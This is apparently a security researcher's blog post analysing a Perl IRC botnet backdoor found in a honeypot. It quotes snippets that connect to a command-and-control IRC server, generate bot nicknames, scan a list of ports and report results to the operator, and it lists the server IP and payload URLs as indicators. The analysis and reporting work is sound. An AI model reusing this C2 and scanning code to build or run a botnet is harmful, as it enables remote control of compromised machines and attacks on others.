Botnet analysis based on IRC network

With one of my many honeypots actived around the world wide web, I discovered an interesting script written with the famous Perl programming language. This Perl script is a malware used to remotely control a machine, opening what is technically called backdoor. If this malicious program runs on multiple machines, there is a possibility that the attacker may have created a botnet.

At first, a botnet is a network controlled by a bots master and composed of devices infected with specialized malware, called bots or zombies (“Computer zombie”).

Devices connected to the Internet within which there are vulnerabilities in their infrastructure can sometimes become part of the botnet, even if they do not have the malware installed. Through the backdoor, the botmaster can control the system via remote access. Thus infected computers can launch attacks, named, Distributed Denial of Service against other systems or perform other illicit operations.

How it works is relatively simple. Once the machine has been infected, the malware has to listen to the attacker’s remote instructions. There is therefore a sort of node, also called C&C (command and control), which gives “orders” executed by the infected machines.

And there we have the first problem. The centralization of the control point, also called C&C. The central node has to be safe, away from any ISPs and application such as firewalls and antivirus who might notice and block the attack. The authors use various techniques to try to make themselves “invisible” to the user and firewall.

Then the solution is easy: using a decentralized network. No, I’m not talking about using blockchain for botnet (even it’s a funny idea). Some hackers (if they can be defined) use peer-to-peer protocols, and others one use IRC too. And it is IRC that I will go to discuss.

In fact, the malicious program is listening to commands by connecting to a private channel or private chat using the open IRC network. Through the conversation channel, the author is able to control all the infected systems which are listening to the channel. The unknown attacker can be tens of thousands, and to give an order, requiring screen images, credentials and much more.

The program

The program is a clear example of the attempt to add the infected machine to a botnet. Through this post, we will analyze step by step the implemented code. At the beginning of the script we can find interesting variables, useful for connecting to the IRC service.

my @mast3rs = ("z","w","x");
my @hostauth = ("localhost");
my @admchan=("#ssh");
my @server = ("91.191.19.205");

@mast3rs sounds like an unknown array, but only at the end will we understand what it might be; @hostauth would seem to indicate a sort of auth; @admchat specifies an IRC channel, while @server defines the IP of the IRC server to which the machine must connect.

In this excerpt, we have further confirmation of using an IRC socket to communicate with the attacker.

my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);

The username for IRC is generated by joining the @nickname variable with a random number.

my @nickname = ("b");
sub getnick {
        return "$nickname[rand scalar @nickname]".int(rand(20000));
}

Once the machine is connected to IRC, the program is ready to receive information. The attacker (which is operator on IRC) calls the “X” function. For each existing function, a command to be executed is associated. Each function is defined with a regex, here a summary table.

For example, with the pv command, the infected device is a port scanning to find out if any ports are open (ports are defined on the @portas array). The nmap command also serves the same thing, but the ports are specific to a range of values.

my @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501");

This code will check if the port is opened. Simply $scansock is TRUE only when the port returns a valid response.

foreach my $porta (@portas)  {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
if ($scansock) {
        ....
}

If $scansock is valid, the script will send a private message to $printl

sendraw($IRC_cur_socket, "PRIVMSG $printl :Found: $porta"."/Open");

Reporting

Once you find any malware, you should report the various IPs related to the possible illegal activity and the malware itself. In all likelihood, the attack will be (more or less) stopped since there is usually a connected domain / ip and the fact can be reported to the third parties.

Then I’ve tried to join to this IRC server.

16:31 [912]  -!- **Irssi:** Connection to **91.191.19.205** established
16:31 [912]  -!- !unreal.org  *** Looking up your hostname...
16:31 [912]  -!- !unreal.org  *** Couldn't resolve your hostname; using your IP address instead
16:31 [912]  -!- /list LIST command
16:31 [912]  -!- Channel User 
16:32 [912]  -!- #ircd 1132 [+sntu]
16:32 [912]  -!- #aka 85 [+sntu]
16:32 [912]  -!- #ph1 261 [+sntu]
16:32 [912]  -!- #ssh 46 [+sntu]

Over 1500 connected machines (considering each user as an infected machine), all users are “invisible” to anyone, except to the administrators of the network. So, I proceeded to report the fact on Twitter.

New botnet based on IRC network. +1400 potential bot (considering one user connected as one bot).
Server IRC: hxxp://91.191.19.205

Perl scripts: hxxp://192.241.243.77/tar
hxxp://94.23.19.166/hit#botnet #perl #irc pic.twitter.com/PFxDq5XNRs

— SerHack (@serhack_) October 30, 2018

Then the IRC server banned me :- ( .

Well, ok! pic.twitter.com/SrHVWL8ifS

— SerHack (@serhack_) October 30, 2018

Details

• Server IRC: 91.191.19.205
• Perl scripts: 192.241.243.77/tar, 94.23.19.166/hit